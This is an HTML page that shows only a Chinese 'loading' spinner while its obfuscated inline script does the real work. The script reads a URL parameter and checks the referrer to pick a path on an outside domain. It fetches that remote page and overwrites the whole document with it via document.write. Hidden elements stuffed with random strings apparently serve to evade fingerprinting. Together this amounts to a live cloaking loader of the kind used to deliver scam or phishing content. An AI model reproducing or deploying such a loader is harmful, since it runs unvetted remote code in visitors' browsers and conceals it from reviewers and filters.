<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ST92Yn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ST92Yn .VMjv987SAI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ST92Yn .content {
            line-height: 50px;
            text-align: center
        }

        .ST92Yn .img {
            width: 100%
        }

        .ST92Yn .JSb5zsFM {
            text-align: center
        }

        .ST92Yn .JSb5zsFM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ST92Yn .JSb5zsFM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ST92Yn .JSb5zsFM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ST92Yn .JSb5zsFM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ST92Yn .JSb5zsFM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ST92Yn .JSb5zsFM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ST92Yn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function p7lbQKuIF4PEJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SWKFJeJ = p7lbQKuIF4PEJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SWKFJeJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SWKFJeJ +".html?a=share";
		}
		
        PyJg2LS=url+"#"+new Date().getTime();
        PyJg2LS && function() {
            $.get(PyJg2LS, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >Gjcp23oi6bstKA7yGd9IESz1QuzhuwPksDhBJTSqubhpM</li>
<img  src='' style='display:none'>
<p  style='display:none'>mxjlwGdijcLA9hpdNftgmtn6bSXKZLyD6627GXevI3el1iZ2kIJ5IOjEoXOvW9IGaYjI9P9Ytj5iwTK</p>
<div style='display:none'>hButj1URRGDSSpOrqelA8mBC4qutJPK8YWYLXg</div>
<a  href='#' style='display:none'>vFE53pVHYjOpi6HEuMeP4HpN2pb4bur5hsRnOJ2uDUExHTlzYHYqvFCPHResNKlxaEByEvj4t0sqd9pyBFv</a><div class="ST92Yn">
    <div class="VMjv987SAI">
        <div class="JSb5zsFM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >yFSyAGMe67XEkAw</b>
<b style='display:none' >yFSyAGMe67XEkAw</b>
<p  style='display:none'>IWmA9RcQIuTAv15tQ8xQbcGQrUymGlHYsox5LeBmVj3CT9Mv2esgirDCHqWsDhf1LKg1L9k65opAHRFuj5hS390Q6KzYb</p></body>
</html>